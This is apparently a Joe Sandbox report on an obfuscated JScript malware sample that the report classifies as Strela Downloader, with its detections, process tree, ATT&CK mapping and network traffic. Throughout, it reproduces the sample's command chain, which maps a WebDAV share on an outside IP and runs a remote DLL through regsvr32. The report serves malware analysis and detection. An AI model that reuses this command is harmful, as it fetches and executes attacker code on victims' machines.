Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
18452302672446430694.js

Overview

General Information

Sample name:18452302672446430694.js
Analysis ID:1577613
MD5:ee1f06ed31e2785390264856ef313620
SHA1:f029f396c8d471f44641f3998cd52ce7a89b9a0e
SHA256:6c63abd39c020c35ba9e5e307b5f21cbc011a5e16470e6a540ec86eb8291053c
Tags:jsuser-kupschke
Infos:

Detection

Strela Downloader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6700 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6828 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 6860 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 6528JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_6528.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", ProcessId: 6528, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 6860, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6528, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll, ProcessId: 6700, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js", ProcessId: 6528, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 6860, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6828, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 6860, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.143.1.231:8888
      Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
      Source: net.exe, 00000004.00000002.1704010087.00000265DDB19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1701958019.00000265DDB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
      Source: net.exe, 00000004.00000002.1704251401.00000265DDB49000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1702927716.00000265DDB49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/=

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_6528.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6528, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 18452302672446430694.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49730
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 6988Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: net.exe, 00000004.00000003.1701958019.00000265DDB7A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1704010087.00000265DDB19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1704251401.00000265DDB7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting
      Valid AccountsWindows Management Instrumentation12
      Scripting
      11
      Process Injection
      1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      File and Directory Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      18452302672446430694.js3%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://193.143.1.231:8888/0%Avira URL Cloudsafe
      http://193.143.1.231:8888/=0%Avira URL Cloudsafe
      No contacted domains info
      NameSourceMaliciousAntivirus DetectionReputation
      http://193.143.1.231:8888/net.exe, 00000004.00000002.1704010087.00000265DDB19000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1701958019.00000265DDB6E000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://193.143.1.231:8888/=net.exe, 00000004.00000002.1704251401.00000265DDB49000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1702927716.00000265DDB49000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      193.143.1.231
      unknownunknown
      57271BITWEB-ASRUtrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1577613
      Start date and time:2024-12-18 16:03:22 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 2m 3s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:18452302672446430694.js
      Detection:MAL
      Classification:mal72.rans.troj.spyw.evad.winJS@8/0@0/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .js
      • Stop behavior analysis, all processes terminated
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: 18452302672446430694.js
      TimeTypeDescription
      10:04:15API Interceptor1x Sleep call for process: net.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      193.143.1.2312971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231:8888/
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231:8888/140341625623863.dll
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      BITWEB-ASRU2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      2971435162666519472.jsGet hashmaliciousStrela DownloaderBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      126484723232027823.jsGet hashmaliciousStrela Downloader, Strela StealerBrowse
      • 193.143.1.231
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      qL619hzCfc.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      new.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      https://cgd-assinar.comGet hashmaliciousUnknownBrowse
      • 193.143.1.14
      11iEly4m6C.batGet hashmaliciousUnknownBrowse
      • 193.143.1.46
      No context
      No context
      No created / dropped files found
      File type:ASCII text, with very long lines (65536), with no line terminators
      Entropy (8bit):4.961490487199368
      TrID:
        File name:18452302672446430694.js
        File size:127'728 bytes
        MD5:ee1f06ed31e2785390264856ef313620
        SHA1:f029f396c8d471f44641f3998cd52ce7a89b9a0e
        SHA256:6c63abd39c020c35ba9e5e307b5f21cbc011a5e16470e6a540ec86eb8291053c
        SHA512:31cf2d0586feca487d1b005791e79e75401849197c2d06ec8e3586fdb12ba2a08054ac13a9ce1d2f75b9b2bbd46e62bf9c35debc924fff21997141be95b6d81c
        SSDEEP:3072:XDMOHYFc3pJyUdxLJ13/NrFhqgqY6HHt5A/:TMncuKH3FrFgglB/
        TLSH:5AC3BE4AD17253A31E97DE8D000148474871D6A5A1CD5B3A3D7DABAB0F87CCA5BECB32
        File Content Preview:function clexbyfw(){this[jmpwknsf+plvfhkvb+ovrcyowae+jlpvdx](yvzyqe+exoan+brpexp+zfnllx+wfjndtj+rwutkdu+taopupc+cyvtdrrzm+exoan+emrmcm+emrmcm+rwutkdu+emrmcm+phrhdwrxi+zfnllx+weulbp+abwgie+jlpvdx+yvzyqe+srkji+iekcm+exoan+jlpvdx+phrhdwrxi+uustosme+jmpwknsf+
        Icon Hash:68d69b8bb6aa9a86
        TimestampSource PortDest PortSource IPDest IP
        Dec 18, 2024 16:04:14.926991940 CET497308888192.168.2.4193.143.1.231
        Dec 18, 2024 16:04:15.046699047 CET888849730193.143.1.231192.168.2.4
        Dec 18, 2024 16:04:15.046776056 CET497308888192.168.2.4193.143.1.231
        Dec 18, 2024 16:04:15.047728062 CET497308888192.168.2.4193.143.1.231
        Dec 18, 2024 16:04:15.168131113 CET888849730193.143.1.231192.168.2.4
        Dec 18, 2024 16:04:16.510884047 CET888849730193.143.1.231192.168.2.4
        Dec 18, 2024 16:04:16.558962107 CET497308888192.168.2.4193.143.1.231
        Dec 18, 2024 16:04:16.800118923 CET497308888192.168.2.4193.143.1.231
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449730193.143.1.23188886860C:\Windows\System32\net.exe
        TimestampBytes transferredDirectionData
        Dec 18, 2024 16:04:15.047728062 CET107OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: DavClnt
        translate: f
        Host: 193.143.1.231:8888
        Dec 18, 2024 16:04:16.510884047 CET237INHTTP/1.1 500 Internal Server Error
        Server: nginx/1.22.1
        Date: Wed, 18 Dec 2024 15:04:16 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 22
        Connection: keep-alive
        X-Content-Type-Options: nosniff
        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
        Data Ascii: Internal server error


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:10:04:12
        Start date:18/12/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18452302672446430694.js"
        Imagebase:0x7ff63e5e0000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:1
        Start time:10:04:13
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\185394747662.dll
        Imagebase:0x7ff75c550000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:2
        Start time:10:04:13
        Start date:18/12/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff7699e0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:10:04:13
        Start date:18/12/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff75c550000
        File size:289'792 bytes
        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:10:04:13
        Start date:18/12/2024
        Path:C:\Windows\System32\net.exe
        Wow64 process (32bit):false
        Commandline:net use \\193.143.1.231@8888\davwwwroot\
        Imagebase:0x7ff6d32d0000
        File size:59'904 bytes
        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        No disassembly